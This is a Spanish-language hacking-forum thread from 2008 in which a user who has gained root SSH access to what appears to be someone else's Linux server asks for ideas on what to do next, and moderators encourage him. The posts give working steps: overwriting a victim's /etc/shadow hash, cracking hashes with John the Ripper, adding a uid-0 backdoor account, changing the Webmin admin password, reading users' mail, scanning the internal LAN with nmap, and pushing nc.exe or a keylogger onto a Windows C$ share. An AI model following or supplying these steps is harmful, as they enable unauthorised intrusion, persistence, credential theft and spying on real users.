Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse. - Julio 05, 2008, 08:09:45
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Sistemas Operativos  |  Sistemas operativos libres.  |  GNU/Linux (Moderadores: blood_r3c, Th3 ziX™)  |  Tema: Ideas luego de tener acceso a un server 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Ideas luego de tener acceso a un server  (Leído 188 veces)
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« en: Marzo 23, 2008, 03:17:56 »
Logre acceder a un server por medio de SSH. El server esta en un O.S linux creo que es Red Hat Enterprise.

Ese servidor tiene :
  • Sendmail
  • Apache
  • MySql
Según lo poco que he podido ver.... pero no se que mas puedo hacer, me gustaria que me dieran ideas...

Por ejemplo quiero crear un nuevo usuario que tenga privilegios parecidos al root y que me sirve para entrar por SSH... pero no se como Huh?

Habilitarle el Webmin,

Crear un nuevo usuario con privilegios de admin para MySql

Con el editor nano y entrando a la carpeta /home/correos/<nombre.usuario> puedo leer los correos pero me gustaría poderlos mirar con el Thunderbird

Quiero aprender esto pues pienso que para poder defenderse hay que saber como nos pueden atacar !!!
En línea
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #1 en: Marzo 23, 2008, 04:46:47 »
Tengo una idea...

Mirando el archivo que contiene los pass de linux, llamado shadow que se encuentra en la ruta /etc/shadow  se me ocurrió lo siguiente...

Según leo parece casi imposible desencriptar el password, entonces cree un usuario y le asigne password y copie ese código encriptado del usuario nuevo a un usuario que quiero acceder...

La pregunta es, luego de acceder podria volver a restablecer el password anterior colocando el valor de encriptacion Huh

podar un ejemplo:
originalmente esta así:
Código:
user_nuevo:$1$5Qw0bMx4$KeWpS2DB8I2C5b3to9/uj0:13936:0:99999:7:::
user_victima:$1$$6JT5hX/Wf7pA6YZU7ca.r.:13888:0:99999:7:::

La idea es cambiarlo así:
Código:
user_nuevo:$1$5Qw0bMx4$KeWpS2DB8I2C5b3to9/uj0:13936:0:99999:7:::
user_victima:$1$5Qw0bMx4$KeWpS2DB8I2C5b3to9/uj0:13936:0:99999:7:::

Y luego de acceder cambiarlo a como se encontraba originalmente
En línea
Th3 ziX™
Moderadores
Gran Colaborador
*****
Conectado Conectado

Mensajes: 1880


La vida es 1 vivela al maximo


Ver Perfil WWW
« Respuesta #2 en: Marzo 23, 2008, 05:56:09 »
Pues nunca me e puesto hacer eso xD..
si esta interesante aver porque mejor no lo pruebas...aver como va Tongue

Th3 ziX
En línea

blood_r3c
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 504


uid=0(root) gid=0(root) groups=0(root)

691337 hack.blood_rec@hotmail.com
Ver Perfil WWW
« Respuesta #3 en: Marzo 23, 2008, 06:19:07 »
pos clarines que podes crackear los pass del shadow archive trata para que veas los crackeas Wink

con john por supuesto
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Fuck +|-|3 3t|-|ik4l H4c|<iNg
Black Roots Group

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #4 en: Marzo 23, 2008, 06:20:20 »
si funciona.... pero de todas manera me gustaría obtener el pass original con el software John the Ripper pude encontrar algunos pass, pero no los que yo quería...

estoy cacharriando como usar ese software pues veo que funciono con algunos passwords

blood_r3c me das una mano de como usar ese software, tener en cuenta que el software lo estoy ejecutando sobre Windows claro esta que copie los archivos /etc/shadow y etc/passwd....

Descargue el software de
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
aqui
y el nod32 me alerta de un troyano en el archivo john-386.exe. yo obtuve los password que dije de la siguiente manera

C:\john>unshadow passwd shadow
C:\john>john-mmx --single shadow password.lst

« Última modificación: Marzo 23, 2008, 06:46:05 por fa61an » En línea
blood_r3c
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 504


uid=0(root) gid=0(root) groups=0(root)

691337 hack.blood_rec@hotmail.com
Ver Perfil WWW
« Respuesta #5 en: Marzo 23, 2008, 06:25:34 »
 Wink Grin

salu2
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Fuck +|-|3 3t|-|ik4l H4c|<iNg
Black Roots Group

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #6 en: Marzo 30, 2008, 04:24:26 »
Numere varias posibles idea luego de tener acceso a un Server Linux

Una de ella

Crear nuevo usuario con privilegios de root para no tener que volver a explotar vulnerabilidad
Código:
#useradd -u 0 -o -g 0 <nuevo_usuario>
#passwd <nuevo_usuario>


Luego de verificar el archivo /etc/passwd se compara con el usuario root tienen las mismas características
Código:
root:x:0:0:root:/root:/bin/bash
<nuevo_usuario>:x:0:0::/home/<nuevo_usuario>:/bin/bash

Modificar clave usuario webmin
La idea seria crear un nuevo usuario para el webmin desde consola pero aun no lo he podido encontrar, pero si encontre la forma de cambiar el password de un usuario existente.

Código:
#locate changepass.pl
/opt/webmin-1.340/changepass.pl
#/opt/webmin-1.340/changepass.pll /etc/webmin admin <passwd>

Este comando anterior no me gusto mucho pues el admin se daria cuenta que se cambio la clave.....

Si se tiene bien adecuando el Webmin se puede hasta revisar los correo de todos los usuarios en el Sendmail....

Se me ocurrieron otras ideas como instalar un Sniffer ya que el servidor tiene un Proxy y todo el trafico pasa por el... Que SUGERENCIAS me dan sobre esto...
En línea
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #7 en: Abril 09, 2008, 05:28:38 »
El servidor, funciona como un proxy entre otras cosas, y una red lan detras de él

Con un comando basico en nmap pude ver los equipos conectados a él

#nmap -sP 192.168.248.0/24
192.168.248.101

el resultado fueron varias ip pero la que mencino es la que me llama la atencion.
Código:
#nmap -O 192.168.248.101

53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1040/tcp open  netsaint
1058/tcp open  nim
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-term-serv

Running: Microsoft Windows 2003/.NET|NT/2K/XP
OS details: Microsoft Windows 2003 Server or XP SP2

Luego de ello verifico si esta insalado el demonio smb y efectivamente esta correctamente instalado y funcionando

Entonces prosiguio hacer lo siguiente

Código:
#smbclient -L 192.168.248.101 -l

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC remota
        netsupportschool Disk     
        NETLOGON        Disk      Recurso compartido del servidor de inicio de sesión
        musica m        Disk     
        ADMIN$          Disk      Admin remota
        SYSVOL          Disk      Recurso compartido del servidor de inicio de sesión
        C$              Disk      Recurso predeterminado

Ahora vienen las preguntas... es lo unico que he podido hacer hasta ahora, mi idea es poder entrar a C$ para luego escalar privilegios, como lo hago..

Aclaro que esto se hace con fin educativo,... y que el equipo esta en Linux por ssh

PD: no les pido que me lo hagan simplemente que me de ideas que debo tener en cuenta para realizar una mejor busqueda y lograr entrar.
En línea
blood_r3c
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 504


uid=0(root) gid=0(root) groups=0(root)

691337 hack.blood_rec@hotmail.com
Ver Perfil WWW
« Respuesta #8 en: Abril 09, 2008, 06:11:18 »
bueno bro te contesto...en hacking hay temas similares pero igual aca te contesto...verifica si te deja subir archivos por algun lado te los deja subir Wink y de ahi usa la herramienta mas antigua que los hackers le facinan  NETCAT cheka si te deja subir archivos y subele una shell de ahi puedes escalar privilegios
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Fuck +|-|3 3t|-|ik4l H4c|<iNg
Black Roots Group

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #9 en: Abril 10, 2008, 08:30:16 »
si pudo subir un archivo pero yo quiero saber como hacer para que se ejecute el archivo en esa maquina

Con el siguiente comando pude acceder a un recurso compartido

Código:
smbclient //192.168.248.11/downoad
smb: \>put archivo.txt
smb: \>ls
archivo.txt

Ahora ya esta en ese equipo, digamos que el archivo sea un bouncer, o un programa que escuche por un socket, pero el detalle es que el programa no se esta ejecutando y ese el lio..

Se del Netcat nunca lo usuado pero segun tengo entendido hay que recompilarlo desde las fuentes para que no sea detactado. Y ahi es donde no se como hacer Huh?

Ah se me olvidaba tambien hay un recurso llamando Documentos c, pero cuando utilizo el siguiente comando me aparece..

Código:
smbclient //192.168.248.11/Documentos c
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
Yo presumo que es por el Espacio, porque de pedir contraseña el error seria diferente... Como se hace cuando un recurso tiene un espacio
« Última modificación: Abril 10, 2008, 08:38:51 por fa61an » En línea
LTSmash
Miembro
*****
Desconectado Desconectado

Mensajes: 71

Fuck up


Ver Perfil
« Respuesta #10 en: Abril 21, 2008, 06:26:45 »
Cita de: fa61an en Abril 10, 2008, 08:30:16
si pudo subir un archivo pero yo quiero saber como hacer para que se ejecute el archivo en esa maquina

Con el siguiente comando pude acceder a un recurso compartido

Código:
smbclient //192.168.248.11/downoad
smb: \>put archivo.txt
smb: \>ls
archivo.txt

Ahora ya esta en ese equipo, digamos que el archivo sea un bouncer, o un programa que escuche por un socket, pero el detalle es que el programa no se esta ejecutando y ese el lio..

Se del Netcat nunca lo usuado pero segun tengo entendido hay que recompilarlo desde las fuentes para que no sea detactado. Y ahi es donde no se como hacer Huh?

Ah se me olvidaba tambien hay un recurso llamando Documentos c, pero cuando utilizo el siguiente comando me aparece..

Código:
smbclient //192.168.248.11/Documentos c
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
Yo presumo que es por el Espacio, porque de pedir contraseña el error seria diferente... Como se hace cuando un recurso tiene un espacio



pero si ya tienes acceso de root con SSH que mas quieres xD?
Ahora abre el editor nano y edita el archivo de configuracion de SSH para que te deje hacer X forwarding, asi podras usar aplicaciones graficas sin lio alguno :p
En línea
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #11 en: Abril 21, 2008, 11:43:27 »
Yo no hablada de eso exactamente pero gracias por lo del X forwarding.

Supangamos lo siguiente:
Se tiene acceso a un servidor por SSH como usuario root(como dice : LTSmash que mas se puede pedir).

El servidor (Linux) tiene funcion de proxy y de nat, luego tiene dos tarjetas de red una que conecta a la red local y otra con Ip publica fija.

Al tener tener acceso al servidor se usa un analisis con #nmap -sP 192.168.1.0/24 y luego por equipo encontrado se hizo un #nmap -O $dir_ip_equipo.  (se que esto hace mucho ruido pero no va al caso).

Se encontraron equipos windows y por medio del smbclient se puedo subir un archivo al recurso compartido por defecto C$. Como decia mas arriba pude subir un arhicivo por ejemplo un netcat o un keylogger ahora el detalle esta en como hacer para que se ejecute en el equipo windows Huh?

La idea que he tenido hasta el momento era la modificar un acceso directo en el escritorio por ejemplo el MSN como lo trato de sustentar en el siguiente post

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
http://foro.el-hacker.com/index.php/topic,125508.msg474126.html#msg474126


Todo con el fin de que se ejecute el archivo montado atraves del server linux al equipo windows con el smbclient


Lo de los recursos compartidos que tienen nombres espacio lo pude acceder creando una carpeta con el nombre identico en otro windows y por medio de una consola MS-DOS hacer un dir /x y ver el nombre abraviado para esa carpeta
En línea
LTSmash
Miembro
*****
Desconectado Desconectado

Mensajes: 71

Fuck up


Ver Perfil
« Respuesta #12 en: Abril 22, 2008, 04:13:15 »
Oh, ya veo.

hum, por que no subes una shell a los servidores windows y ya haces lo que quieres?

Ah, pero dices que te esta fallando samba.

Hum.

Mira esto:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
En línea
fa61an
Miembro
*****
Desconectado Desconectado

Mensajes: 83


Ver Perfil Email
« Respuesta #13 en: Abril 22, 2008, 04:34:54 »
si tuve problemas cuando las carpetas tenian nombre con espacios.

ejemplo: mis fotos
solucion: cd misfot~1

ejemplo: Documentos c
solucion: docume~1

Pero puede acceder al recurso C$ 
Código:
smbclient //dir_ip_equipo/C$ -U USUARIO_ADMINISTRADOR jejeje

smb>put nc.exe
Y listo nc.exe se encuentra ubicado en el disco local C. como decia antes ya lo pude subir ahora como lo pongo a ejecutar Huh  Tongue.


si existiera algo como el Pstools para linux lo hubiese hecho hace rato... ¿ Existe una herramienta parecida al Pstools que puede hacer un psexec desde un equipo linux a un equipo windows.
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Sistemas Operativos  |  Sistemas operativos libres.  |  GNU/Linux (Moderadores: blood_r3c, Th3 ziX™)  |  Tema: Ideas luego de tener acceso a un server « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC